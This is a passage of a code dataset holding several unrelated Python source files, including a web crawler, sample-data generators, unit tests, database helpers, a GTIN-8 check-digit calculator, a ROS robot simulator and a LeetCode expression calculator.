u'文件不存在!'})\n return\n\n if not osp.isfile(path):\n self.write({'err': True, 'msg': u'请输入一个文件名而不是目录名!'})\n return\n\n conf = json.loads(open(settings.CONF_PATH).read())\n paths = conf.get('paths', [])\n paths = set(paths)\n paths.add(path)\n conf['paths'] = list(paths)\n open(settings.CONF_PATH, 'w').write(json.dumps(conf))\n\n self.write({'err': False})\n\n\nclass Application(tornado.web.Application):\n def __init__(self):\n us = []\n env = globals()\n for route in urls.urls:\n if len(route) > 2:\n continue\n url, handler_name = route\n handler = env.get(handler_name, None)\n if handler is not None:\n us.append((url, handler))\n else:\n logging.warning('`{0}` not found'.format(handler_name))\n tornado.web.Application.__init__(self, us, **settings.TORNADO_SETTINGS)\n\n\napplication = Application()\n","sub_path":"mdi/main/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":3926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"371100663","text":"# coding=utf-8\n# This is a sample Python script.\n\n# Press ⌃R to execute it or replace it with your code.\n# Press Double ⇧ to search everywhere for classes, files, tool windows, actions, and settings.\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom openpyxl.worksheet.worksheet import Worksheet\nfrom requests.sessions import Session\nimport requests\nimport openpyxl\n\nlogin_html = ''\nparams = dict()\nparams['loginId'] = ''\nparams['loginPwd'] = ''\nparams['mode'] = 'login'\n\nmodelId = []\nfileName = 'result.xlsx'\n\ntotalCount = 1\npageCount = 2\nonePageGoodsCount = 2\n\nwb = openpyxl.Workbook()\nsheet = wb.active\n\n\ndef get_html(url):\n _html = \"\"\n resp = requests.get(url)\n if resp.status_code == 200:\n _html = resp.text\n return _html\n\n\ndef setSession():\n login = session_data.post(login_html, params)\n login.raise_for_status()\n # 세션 설정을 위하여 최초한번 로드???\n loadPage(\"9800800056\")\n\n\ndef loadPage(keywordValue):\n # keywordValue = \"5012035901738\"\n crawl_url = \"\" + str(keywordValue) + \"\"\n login = session_data.get(crawl_url)\n soupData = BeautifulSoup(login.content, 'html.parser') # type: BeautifulSoup\n return soupData\n\n\ndef setExcelColumn():\n sheet.cell(1, 1).value = \"번호\"\n sheet.cell(1, 2).value = \"상품명\"\n sheet.cell(1, 3).value = \"모델명\"\n sheet.cell(1, 4).value = \"판매여부\"\n\n\n# remove dummy data type-2\ndef getTitle(originResult):\n arrMid = originResult.split(\" title=\")\n arrLast = arrMid[1].split(\" width=\")\n return arrLast[0]\n\n\ndef getData(originResult):\n arr = str(originResult).split('item-display type-gallery')\n # print(arr[1])\n arrMid = arr[1].split(\"\")\n # print(arrMid)\n arrLast = arrMid[1].split(\"\")\n # print(arrLast[0])\n return arrLast[0]\n\n\ndef ExcelRead():\n global modelId\n global totalCount\n workbook = openpyxl.load_workbook('list.xlsx')\n ws = workbook['name']\n\n for cell in ws['G']: # A열의 모든 셀을 확인\n # print(str(cell.value).strip())\n typeCase = \"0\"\n devalue = str(cell.value).strip()\n if devalue == \"None\":\n # print(\"is None\")\n typeCase = \"1\"\n elif devalue == \"모델명\":\n # print(\"is 모델명\")\n typeCase = \"2\"\n else:\n # print(str(cell.value).strip())\n modelId.append(devalue)\n\n return modelId\n\n\ndef dataArray(soupData):\n galleryData = soupData.find('div', class_='item-display type-gallery')\n thumbnailData = galleryData.find_all('div', class_='thumbnail')\n return thumbnailData\n\n\ndef excelWrite(keywordValue, resultData):\n global totalCount\n checkWord = \"soldout-img\"\n\n 
print(totalCount)\n print(resultData)\n print(len(resultData))\n # testData.\n # href.find(\"a\")[\"href\"]\n # 파싱 방법 찾음.\n print(resultData.find(\"img\")[\"title\"])\n\n sheetNumBer = totalCount + 1\n sheet.cell(sheetNumBer, 1).value = str(totalCount) # \"번호\"\n sheet.cell(sheetNumBer, 2).value = str(getTitle(str(resultData)))\n sheet.cell(sheetNumBer, 3).value = str(keywordValue)\n\n if checkWord in str(resultData):\n sheet.cell(sheetNumBer, 4).value = str(\"품절\")\n else:\n sheet.cell(sheetNumBer, 4).value = str(\"판매중\")\n wb.save(fileName)\n totalCount += 1\n\n\ndef checkData(keywordValue):\n global totalCount\n\n soupData = loadPage(keywordValue)\n resultArray = dataArray(soupData) # 검색 결과 배열\n\n j = 0\n while j < len(resultArray):\n excelWrite(keywordValue, resultArray[j])\n j += 1\n\n\nif __name__ == '__main__':\n session_data = requests.session() # type: Session\n totalCount = 1\n print(\"[START]\")\n setSession()\n modelId = ExcelRead()\n\n wb = openpyxl.Workbook()\n sheet = wb.active\n setExcelColumn()\n\n i = 0\n while i < len(modelId):\n checkData(str(modelId[i]))\n # wb.save(fileName)\n i += 1\n\n print('[END]')\n","sub_path":"crawling/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"350570018","text":"import pandas as pd, random\nfrom korean_name_generator import namer\n\nclass DataCreate:\n def __init__(self, memberNumber=10000, dataCount=100):\n self.memberNumber = memberNumber\n self.dataCount = dataCount\n\n def memberNumberCreate(self):\n return [self.memberNumber + i for i in range(1, self.dataCount+1)]\n\n def nameCreate(self, maleRatio=0.7, femaleRatio=0.3):\n maleName = [namer.generate(True) for _ in range(int(self.dataCount * maleRatio))]\n femaleName = [namer.generate(False) for _ in range(int(self.dataCount * femaleRatio))]\n return maleName + femaleName\n\n def genderList(self, maleRatio=0.7, femaleRatio=0.3):\n male = ['male' for _ in range(int(self.dataCount * maleRatio))]\n female = ['female' for _ in range(int(self.dataCount * femaleRatio))]\n return male + female\n\n def phoneNumberCreate(self):\n result = []\n for _ in range(self.dataCount):\n mid = str(random.randrange(1, 9999))\n if len(mid) < 4:\n mid = ('0' * (4-len(mid))) + mid\n\n bottom = str(random.randrange(1, 9999))\n if len(bottom) < 4:\n bottom = ('0' * (4-len(bottom))) + bottom\n\n result.append(f'010-{mid}-{bottom}')\n\n return result\n\n def ageCreate(self, start, end):\n return [random.randrange(start, end) for _ in range(self.dataCount)]\n\n def birthCreate(self):\n result = []\n for _ in range(self.dataCount):\n month = random.randrange(1, 12)\n day = random.randrange(1, 31)\n\n if month == 2:\n if day > 28:\n day = 28\n\n result.append(f'{month}월 {day}일')\n\n return result\n\nif __name__ == '__main__':\n data = DataCreate()\n\n memberNumber = data.memberNumberCreate()\n nameList = data.nameCreate()\n genderList = data.genderList()\n age = data.ageCreate(20, 80)\n birth = data.birthCreate()\n phoneNumber = data.phoneNumberCreate()\n\n datas = {\n '회원번호': memberNumber,\n '이름': nameList,\n '성별': genderList,\n '나이': age,\n '생일': birth,\n '전화번호': phoneNumber\n }\n df = pd.DataFrame(datas)\n\n df.to_excel('test.xlsx')\n","sub_path":"User/LRTK/Code/Old/sample_excel.py","file_name":"sample_excel.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"34187942","text":"import 
sys\nfrom unittest import TestCase\n\nfrom scattertext.viz.HTMLVisualizationAssembly import HTMLVisualizationAssembly\nfrom scattertext.viz.VizDataAdapter import VizDataAdapter\n\n\nclass TestHTMLVisualizationAssembly(TestCase):\n\tdef test_main(self):\n\t\tassembler = self.make_assembler()\n\t\thtml = assembler.to_html()\n\t\tif sys.version_info.major == 2:\n\t\t\tself.assertEqual(type(html), unicode)\n\t\telse:\n\t\t\tself.assertEqual(type(html), str)\n\t\tself.assertFalse('' in html)\n\t\tself.assertTrue('Republican' in html)\n\n\tdef test_protocol_is_https(self):\n\t\thtml = self.make_assembler().to_html(protocol='https')\n\t\tself.assertTrue('https://' in html)\n\t\tself.assertFalse('http://' in html)\n\n\tdef test_protocol_is_http(self):\n\t\thtml = self.make_assembler().to_html(protocol='http')\n\t\tself.assertFalse('https://' in html)\n\t\tself.assertTrue('http://' in html)\n\n\tdef test_protocol_defaults_to_http(self):\n\t\tself.assertEqual(self.make_assembler().to_html(protocol='http'),\n\t\t self.make_assembler().to_html(), )\n\n\tdef test_raise_invalid_protocol_exception(self):\n\t\twith self.assertRaisesRegexp(BaseException,\n\t\t \"Invalid protocol: ftp. Protocol must be either http or https.\"):\n\t\t\tself.make_assembler().to_html(protocol='ftp')\n\n\tdef test_height_width_default(self):\n\t\tassembler = self.make_assembler()\n\t\tself.assertEqual(assembler._get_build_viz_call(), \"buildViz(undefined,undefined);\")\n\n\tdef test_height_width_nondefault(self):\n\t\tvisualization_data = self.make_adapter()\n\t\tself.assertEqual((HTMLVisualizationAssembly(visualization_data, width_in_pixels=1000)\n\t\t ._get_build_viz_call()),\n\t\t \"buildViz(1000,undefined);\")\n\n\t\tself.assertEqual((HTMLVisualizationAssembly(visualization_data, height_in_pixels=60)\n\t\t ._get_build_viz_call()),\n\t\t \"buildViz(undefined,60);\")\n\n\t\tself.assertEqual((HTMLVisualizationAssembly(visualization_data,\n\t\t height_in_pixels=60,\n\t\t width_in_pixels=1000)\n\t\t ._get_build_viz_call()),\n\t\t \"buildViz(1000,60);\")\n\n\tdef make_assembler(self):\n\t\tvisualization_data = self.make_adapter()\n\t\tassembler = HTMLVisualizationAssembly(visualization_data)\n\t\treturn assembler\n\n\tdef make_adapter(self):\n\t\twords_dict = {\"info\": {\"not_category_name\": \"Republican\", \"category_name\": \"Democratic\"},\n\t\t \"data\": [{\"y\": 0.33763837638376387, \"term\": \"crises\", \"ncat25k\": 0,\n\t\t \"cat25k\": 1, \"x\": 0.0, \"s\": 0.878755930416447},\n\t\t {\"y\": 0.5, \"term\": \"something else\", \"ncat25k\": 0,\n\t\t \"cat25k\": 1, \"x\": 0.0,\n\t\t \"s\": 0.5}]}\n\t\tvisualization_data = VizDataAdapter(words_dict)\n\t\treturn visualization_data\n","sub_path":"scattertext/test/test_HTMLVisualizationAssembly.py","file_name":"test_HTMLVisualizationAssembly.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"647290756","text":"import os\r\nimport psycopg2\r\n\r\n\r\nDATABASE_URL = os.environ['DATABASE_URL']\r\nconn = psycopg2.connect(DATABASE_URL, sslmode='require')\r\n# try:\r\n# DATABASE_URL = os.environ['DATABASE_URL']\r\n# conn = psycopg2.connect(DATABASE_URL, sslmode='require')\r\n# except:\r\n# print(\"Database not connected\")\r\n\r\n\r\ncur = conn.cursor()\r\n\r\ndef create_results(user_email, ip, access_date, user_decision, url, title, ml_result, highlight_result):\r\n row_data = (user_email, ip, access_date, user_decision, url, title, ml_result, highlight_result)\r\n new_row = \"INSERT 
INTO user_data(user_email, ip, access_date, user_decision, url, title, ml_result, highlight_result) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)\"\r\n cur.execute(new_row, row_data)\r\n conn.commit()\r\n\r\n\r\n\r\n\r\ndef update_user_decision(user_email, user_decision):\r\n latest_entry = \"SELECT * FROM user_data WHERE user_email = %s ORDER BY id DESC LIMIT 1\"\r\n cur.execute(latest_entry, [user_email])\r\n result = cur.fetchall()\r\n for row in result:\r\n row_number = row[0]\r\n update_user_answer = \"\"\" UPDATE user_data\r\n SET\r\n user_decision = %s\r\n WHERE\r\n id = %s\"\"\"\r\n values = (user_decision, row_number)\r\n cur.execute(update_user_answer, values)\r\n conn.commit()\r\n","sub_path":"backend/datamanager.py","file_name":"datamanager.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"488479233","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Library/Python/3.7/site-packages/tripgo_parser/get.py\n# Compiled at: 2020-01-31 20:22:28\n# Size of source mod 2**32: 5366 bytes\nimport os, requests, json, datetime, time\n\nclass Response:\n\n def __init__(self, key, origlat, origlon, destlat, destlon, startime, date, tripid='', modes=None, allModes=False, bestOnly=False):\n self.tripid = tripid\n self.origlat = origlat\n self.origlon = origlon\n self.destlat = destlat\n self.destlon = destlon\n self.startime = startime\n self.orig = '(' + str(origlat) + ',' + str(origlon) + ')'\n self.dest = '(' + str(destlat) + ',' + str(destlon) + ')'\n self.startime = startime\n self.allModes = allModes\n self.bestOnly = bestOnly\n self.modes = modes if modes is not None else []\n self.startimeTimestamp = self.dateToTimestamp(date) + int(startime) * 60\n self.fileExists = False\n self.usageExceeded = False\n self.parameters = self.create_parameters()\n self.headers = {'X-TripGo-Key': key}\n\n def create_parameters(self):\n parameters = {'v':11, \n 'from':self.orig, \n 'to':self.dest, \n 'departAfter':int(self.startimeTimestamp), \n 'bestOnly':self.bestOnly}\n if len(self.modes) != 0:\n parameters.update({'modes': self.modes})\n else:\n parameters.update({'allModes': True})\n return parameters\n\n def fetch(self):\n while True:\n try:\n results = requests.get('https://api.tripgo.com/v1/routing.json', params=(self.parameters),\n headers=(self.headers))\n data = results.json()\n print('Successful fetch from %s' % results.url)\n self.checkUsageLimit(data)\n if self.usageExceeded:\n print('Error: API usage exceeded. 
Waiting 60 seconds...')\n                    time.sleep(60)\n                    continue\n                return data\n            except Exception as e:\n                try:\n                    print('Error: ' + str(e)) # exceptions in Python 3 have no .message attribute\n                    print('Retrying in 5...')\n                    time.sleep(5)\n                    continue\n                finally:\n                    e = None\n                    del e\n\n    def save(self, destination_folder, unique_id=''):\n        directory = self.dir_path(destination_folder)\n        path, id, file_exists = self.file_path(directory, unique_id)\n        if file_exists:\n            print('File {} already exists.'.format(str(id)))\n        else:\n            data = self.fetch()\n            with open(path, 'w') as f:\n                json.dump(data, f)\n        return True\n\n    def dir_path(self, destination_folder):\n        cwd = os.getcwd()\n        directory = os.path.join(cwd, destination_folder)\n        dirExists = os.path.exists(directory)\n        if not dirExists:\n            os.mkdir(destination_folder)\n        return directory\n\n    def file_path(self, directory, unique_id=''):\n        md = '-'.join(self.modes) if self.modes else '' # truthiness check; the original 'is not []' was always True\n        if unique_id == '' and self.tripid == '':\n            olt = self.origlat[-4:]\n            oln = self.origlon[-4:]\n            dlt = self.destlat[-4:]\n            dln = self.destlon[-4:]\n            unique_id = '{}-{}-{}-{}-{}{}.json'.format(olt, oln, dlt, dln, self.startime, md)\n        else:\n            if unique_id == '':\n                if self.tripid != '':\n                    if self.modes == []:\n                        unique_id = '{}-{}.json'.format(self.tripid, self.startime)\n                    else:\n                        unique_id = '{}-{}-{}.json'.format(self.tripid, self.startime, md)\n            else:\n                unique_id = ''.join([unique_id, '.json'])\n        path = os.path.join(directory, unique_id)\n        pathExists = os.path.exists(path)\n        return (\n         path, unique_id, pathExists)\n\n    def dateToTimestamp(self, dateString):\n        dateArray = dateString.split('/')\n        dateArray = [int(i) for i in dateArray]\n        currentYear = datetime.datetime.now().year\n        timestamp = datetime.datetime(currentYear + 1, dateArray[1], dateArray[0]).timestamp()\n        return int(timestamp) + 36000\n\n    def checkUsageLimit(self, data):\n        try:\n            if 'usage' in data['error']:\n                self.usageExceeded = True\n        except:\n            self.usageExceeded = False","sub_path":"pycfiles/tripgo_parser-0.3.0.macosx-10.14-x86_64.tar/get.cpython-37.py","file_name":"get.cpython-37.py","file_ext":"py","file_size_in_byte":4568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"12124314","text":"import time\r\nlist = []\r\nprint(\"Welcome To GTIN-8 Version 0.8.1\")\r\nanswer_1 = 1\r\nwhile (answer_1 == 1):\r\n\r\n    def option1():\r\n        count = 7\r\n        index = 0\r\n        list = []\r\n        for index in range(count):\r\n\r\n            print(\"Enter a single number then press enter\")\r\n            number = int(input())\r\n            list.insert(index, number)\r\n        \r\n        GTIN8_1 = list[0] * 3\r\n        GTIN8_2 = list[1] * 1\r\n        GTIN8_3 = list[2] * 3\r\n        GTIN8_4 = list[3] * 1\r\n        GTIN8_5 = list[4] * 3\r\n        GTIN8_6 = list[5] * 1\r\n        GTIN8_7 = list[6] * 3\r\n        GTIN_8_8 = GTIN8_1 + GTIN8_2 + GTIN8_3 + GTIN8_4 + GTIN8_5 + GTIN8_6 + GTIN8_7\r\n        GTIN_8_8_round = round(GTIN_8_8, -1)\r\n        \r\n        \r\n        if(GTIN_8_8 > GTIN_8_8_round):\r\n            GTIN_8_8_round = GTIN_8_8_round + 10\r\n            GTIN_8_8 = GTIN_8_8_round - GTIN_8_8\r\n            list.append(GTIN_8_8)\r\n        \r\n        else:\r\n            GTIN_8_8 = GTIN_8_8_round - GTIN_8_8\r\n            list.append(GTIN_8_8)\r\n        return list\r\n\r\n    def GTIN_8_8():\r\n        print(\"Your GTIN 8 product code is:\")\r\n        print(list)\r\n        answer_1 = 1\r\n\r\n    def ValOption2():\r\n\r\n        count = 8\r\n        index = 0\r\n        list = []\r\n\r\n        for index in range(count):\r\n\r\n            print(\"To validate the GTIN-8 Code\")\r\n            print(\"Enter a single number then press enter\")\r\n            number = int(input())\r\n            list.insert(index, number)\r\n        \r\n        \r\n        valGTIN8_1 = list[0] * 3\r\n        valGTIN8_2 = list[1] * 1\r\n        valGTIN8_3 = 
list[2] * 3\r\n        valGTIN8_4 = list[3] * 1\r\n        valGTIN8_5 = list[4] * 3\r\n        valGTIN8_6 = list[5] * 1\r\n        valGTIN8_7 = list[6] * 3\r\n        valGTIN8_8 = list[7] * 1\r\n\r\n        totalval = valGTIN8_1 + valGTIN8_2 + valGTIN8_3 + valGTIN8_4 + valGTIN8_5 + valGTIN8_6 + valGTIN8_7 + valGTIN8_8\r\n\r\n        if totalval%10==0:\r\n            print(\"Your GTIN-8 has been successfully validated\")\r\n\r\n        else:\r\n            print(\"Your GTIN-8 has failed to validate\")\r\n\r\n        answer_1 = 1\r\n        \r\n\r\n    print(\"To select an option, input its number\")\r\n    print(\"Option.1 Calculate the GTIN-8 product code from a seven digit number\")\r\n    print(\"Option.2 Check the validity of an eight digit GTIN-8 code\")\r\n    print(\"Option.3 View a generated GTIN-8\")\r\n    \r\n    menu_answer = input()\r\n\r\n\r\n    if (menu_answer == \"1\"):\r\n        list = option1()\r\n\r\n\r\n    if (menu_answer == \"2\"):\r\n        ValOption2()\r\n\r\n    if (menu_answer == \"3\"):\r\n        GTIN_8_8()\r\n","sub_path":"GTIN-8 Calculator.py","file_name":"GTIN-8 Calculator.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"62112252","text":"import sqlite3\n\ndef connect():\n    con = sqlite3.connect(\"books.db\")\n    cur = con.cursor()\n    cur.execute(\"CREATE TABLE IF NOT EXISTS book (ID integer Primary Key, Title text, Author text, Year integer, ISBN integer)\")\n    con.commit()\n    con.close()\n\ndef insert(title=\"\",author=\"\",year=\"\",isbn=\"\"):\n    con = sqlite3.connect(\"books.db\")\n    cur = con.cursor()\n    cur.execute(\"INSERT INTO book VALUES (NULL,?,?,?,?)\",(title,author,year,isbn)) # NULL tells sqlite to use an auto-incremented value for the first column, i.e. ID, in the book table\n    con.commit()\n    con.close()\n\ndef view():\n    con = sqlite3.connect(\"books.db\")\n    cur = con.cursor()\n    cur.execute(\"SELECT * FROM book\")\n    rows = cur.fetchall()\n    con.close() # was missing the call parentheses, which left the connection open\n    return rows\n\ndef search(title,author,year,isbn):\n    con = sqlite3.connect(\"books.db\")\n    cur = con.cursor()\n    cur.execute(\"SELECT * FROM book WHERE Title=? OR Author=? OR Year=? OR ISBN=?\",(title,author,year,isbn))\n    rows = cur.fetchall()\n    con.close() # was missing the call parentheses, which left the connection open\n    return rows\n\ndef delete(id):\n    con = sqlite3.connect(\"books.db\")\n    cur = con.cursor()\n    cur.execute(\"DELETE FROM book WHERE id=?\",(id,)) # the trailing comma after id is required when a single argument is passed to delete or update\n    con.commit()\n    con.close()\n\ndef update(id,title,author,year,isbn):\n    con = sqlite3.connect(\"books.db\")\n    cur = con.cursor()\n    cur.execute(\"UPDATE book SET Title=?, Author=?, Year=?, ISBN=? 
WHERE id=?\",(title,author,year,isbn,id))\n con.commit()\n con.close()\n\n#connect()\n#insert(\"Many Masters Many Slaves\",\"Dr Brian Weiss\",1976,987545421)\n#print(view())\n#delete(5)\n#update(3,\"Bhaag Milkha\",\"Milkha Singh\",2014,42456735)\n#print(search(author=\"Milkha Singh\"))\n#print(view())\n","sub_path":"DesktopApp/BackBookApp.py","file_name":"BackBookApp.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"21301731","text":"import os\n\nfrom imageai.Prediction import ImagePrediction\n\nPATH_HERE = os.getcwd()\nPATH_MODEL = os.path.join(PATH_HERE, \"resnet50_weights_tf_dim_ordering_tf_kernels.h5\")\nPATH_IMAGE_INPUT = os.path.join(PATH_HERE, \"image1.jpg\")\n\n\ndef main(path_model, path_img):\n prediction = ImagePrediction()\n prediction.setModelTypeAsResNet()\n prediction.setModelPath(path_model)\n prediction.loadModel()\n\n predictions, probabilities = prediction.predictImage(path_img, result_count=10)\n for eachPrediction, eachProbability in zip(predictions, probabilities):\n print(eachPrediction , \" : \" , eachProbability)\n\n\nif __name__ == '__main__':\n main(path_model=PATH_MODEL, path_img=PATH_IMAGE_INPUT)","sub_path":"examples/image_prediction.py","file_name":"image_prediction.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"480914","text":"import time\nimport P4Summary\nimport CopyBuildBackup\nimport JiraReadme\nimport os\n\ntimefreq = 1800\n\ndef main():\n while 1:\n\n print('')\n print(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n start_time = time.time()\n try:\n os.system('E:\\\\Tool\\\\Install_Opengrok\\\\syn_opengrok.bat')\n CopyBuildBackup.main()\n print('')\n P4Summary.main()\n JiraReadme.main()\n\n except Exception as e:\n # log(str(e), level.error)\n print(str(e))\n pass\n finally:\n print(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n print(\"time elapsed: {:.2f}s\".format(time.time() - start_time))\n print('Idle..............................')\n time.sleep(timefreq)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"auto.py","file_name":"auto.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"466925905","text":"from sys import stdin\r\ndef dfs(i,j):\r\n visit[i][j] = True\r\n x=[i,i-1,i-1,i-1,i,i+1,i+1,i+1]\r\n y=[j-1,j-1,j,j+1,j+1,j+1,j,j-1]\r\n for h in range(8):\r\n if x[h]>=0 and x[h]=0 and y[h] List[\"Trade\"]:\n return [Trade(symbol, side, r.price, r.amount) for r in order_book_rows]\n\n @classmethod\n def trade_from_binance_execution_report_event(cls, execution_report: Dict[str, any]) -> \"Trade\":\n execution_type: str = execution_report.get(\"x\")\n if execution_type != \"TRADE\":\n raise ValueError(f\"Invalid execution type '{execution_type}'.\")\n return Trade(execution_report[\"s\"],\n TradeType.BUY if execution_report[\"S\"] == \"BUY\" else TradeType.SELL,\n float(execution_report[\"L\"]),\n float(execution_report[\"l\"]))\n\n @classmethod\n def to_pandas(cls, trades: List):\n columns: List[str] = [\"symbol\", \"trade_side\", \"price\", \"quantity\"]\n data = [[\n trade.symbol,\n \"BUY\" if trade.side is TradeType.BUY else \"SELL\",\n trade.price,\n trade.amount,\n ] for trade in trades]\n return pd.DataFrame(data=data, 
columns=columns)\n","sub_path":"wings/trade.py","file_name":"trade.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"489076860","text":"#!/usr/bin/python2\n\n# =============================================================================\n# Peter G. Adamczyk \n# 2018-10-11\n# Updated 2021-02-26\n# =============================================================================\n\n\nimport rospy\nimport traceback \nimport me439_mobile_robot_class_v00 as m439rbt\nfrom geometry_msgs.msg import Pose2D\nfrom dogrob_util.msg import ME439WheelSpeeds, ME439WheelAngles, ME439WheelDisplacements\n\n#==============================================================================\n# # Get parameters from rosparam\n#==============================================================================\nwheel_width = rospy.get_param('/wheel_width_actual')\nbody_length = rospy.get_param('/body_length')\nwheel_diameter = rospy.get_param('/wheel_diameter_actual')\nwheel_radius = wheel_diameter/2.0\n\n\nt_previous = None\nf = 100. # Simulation rate of the simulator node\nn = 10 # Publication rate of the Pose\n\ndef simulate(): \n global t_previous, f, n\n \n \n# =============================================================================\n# # Launch a node called \"mobile_robot_simulator\"\n# =============================================================================\n rospy.init_node('mobile_robot_simulator', anonymous=False)\n t_previous = rospy.get_rostime()\n# =============================================================================\n# #Create a mobile robot object from the Imported module \"me439_mobile_robot_class\"\n# =============================================================================\n robot = m439rbt.robot(wheel_width, body_length, wheel_radius)\n \n#==============================================================================\n# # Here start a Subscriber to the \"wheel_speeds_desired\" topic.\n#==============================================================================\n # NOTE the Callback to the set_wheel_speeds function of the robot class.\n # This will update \n # NOTE also the extra arguments to that callback: the Motor Encoders (both in a list)\n sub_wheel_speeds = rospy.Subscriber('/wheel_speeds_desired', ME439WheelSpeeds, set_wheel_speed_targets,robot) \n \n pub_robot_pose = rospy.Publisher('/robot_pose_simulated', Pose2D, queue_size = 1)\n robot_pose_message = Pose2D()\n pub_robot_wheel_angles = rospy.Publisher('/robot_wheel_angles_simulated', ME439WheelAngles, queue_size = 10)\n robot_wheel_angles_message = ME439WheelAngles()\n pub_robot_wheel_displacements = rospy.Publisher('/robot_wheel_displacements_simulated', ME439WheelDisplacements, queue_size = 10)\n robot_wheel_displacements_message = ME439WheelDisplacements()\n \n # Rate object to set a simulation rate\n r = rospy.Rate(f)\n \n# =============================================================================\n# # Loop to run the simulation\n# =============================================================================\n while not rospy.is_shutdown():\n # Count to n here to prevent publishing too often\n for ii in range(n): \n t_current = rospy.get_rostime()\n dt = (t_current - t_previous).to_sec()\n t_previous = t_current # save the current time as the previous time, for the next use. 
\n robot.integration_step(dt)\n \n \n r.sleep() # keep this node from exiting\n \n# =============================================================================\n# # when it gets here (every n-th simulation step) we want to actually publish the data\n# =============================================================================\n# # Maybe log the current position?\n# robot.append_current_position_to_history()\n \n # Now publish the pose\n robot_pose_message.x = robot.r_center_world[0]\n robot_pose_message.y = robot.r_center_world[1]\n robot_pose_message.theta = robot.theta\n pub_robot_pose.publish(robot_pose_message)\n \n # And the encoder angles\n robot_wheel_angles_message.ang_left = robot.left_wheel_angle\n robot_wheel_angles_message.ang_right = robot.right_wheel_angle\n pub_robot_wheel_angles.publish(robot_wheel_angles_message)\n \n # And the wheel displacements\n robot_wheel_displacements_message.d_left = robot.left_wheel_distance_traveled\n robot_wheel_displacements_message.d_right = robot.right_wheel_distance_traveled\n pub_robot_wheel_displacements.publish(robot_wheel_displacements_message)\n \n rospy.loginfo(pub_robot_pose)\n \n \n# =============================================================================\n# # Callback function to set wheel speeds in the robot object\n# =============================================================================\ndef set_wheel_speed_targets(msg_in, robot): \n global t_previous\n t_current = rospy.get_rostime()\n dt = (t_current - t_previous).to_sec()\n t_previous = t_current # save the current time as the previous time, for the next use. \n robot.integration_step(dt)\n robot.set_wheel_speeds(msg_in.v_left, msg_in.v_right)\n \n \n \n \n \n \nif __name__ == '__main__':\n try: \n simulate()\n except rospy.ROSInterruptException: \n traceback.print_exc()\n","sub_path":"mobrob/src/mobile_robot_kinematic_simulator.py","file_name":"mobile_robot_kinematic_simulator.py","file_ext":"py","file_size_in_byte":5313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"296485751","text":"from unittest import TestCase\n\nfrom stellar_model import TransactionsResponse\nfrom stellar_model.model.horizon.transaction import Transaction\nfrom tests.response import load_response_file\n\n\nclass TestTransactionsResponse(TestCase):\n def test_valid(self):\n raw_data = load_response_file(\"transactions_response.json\")\n parsed_data = TransactionsResponse.parse_obj(raw_data)\n self.assertEqual(len(parsed_data.embedded.records), 100)\n for record in parsed_data.embedded.records:\n self.assertTrue(isinstance(record, Transaction))\n self.assertEqual(\n parsed_data.links.self.href,\n \"https://horizon.stellar.org/transactions?cursor=&include_failed=true&limit=100&order=desc\",\n )\n self.assertEqual(parsed_data.links.self.templated, None)\n self.assertEqual(\n parsed_data.links.next.href,\n \"https://horizon.stellar.org/transactions?cursor=150723639505981440&include_failed=true&limit=100&order=desc\",\n )\n self.assertEqual(parsed_data.links.next.templated, None)\n self.assertEqual(\n parsed_data.links.prev.href,\n \"https://horizon.stellar.org/transactions?cursor=150723643801051136&include_failed=true&limit=100&order=asc\",\n )\n self.assertEqual(parsed_data.links.prev.templated, None)\n","sub_path":"tests/response/test_transactions_response.py","file_name":"test_transactions_response.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} 
+{"seq_id":"384377196","text":"# LC227 Basic Calculator II\n# Medium\n\n# Implement a basic calculator to evaluate a simple expression string.\n\n# The expression string contains only non-negative integers, +, -, *, / operators and empty spaces. The integer division should truncate toward zero.\n\n# Note:\n# You may assume that the given expression is always valid.\n# Do not use the eval built-in library function.\n\n\nclass Solution(object):\n\n    # Version A\n    # Use the op stack and number stack\n    # This is quite slow\n    def calculate(self, s: str) -> int:\n        nums = \"0123456789\"\n\n        number, op = [], []\n        temp = \"\"\n        for i in s:\n            if i in nums:\n                temp += i\n            elif i in \"*/+-\":\n                number.append(int(temp))\n                temp = \"\"\n                op.append(i)\n        number.append(int(temp))\n\n        k = 0\n        while k != len(op):\n            o = op[k]\n            if o in \"*/\":\n                if o == \"*\":\n                    number[k] = number[k] * number[k + 1]\n                if o == \"/\":\n                    number[k] = number[k] // number[k + 1]\n                number.pop(k + 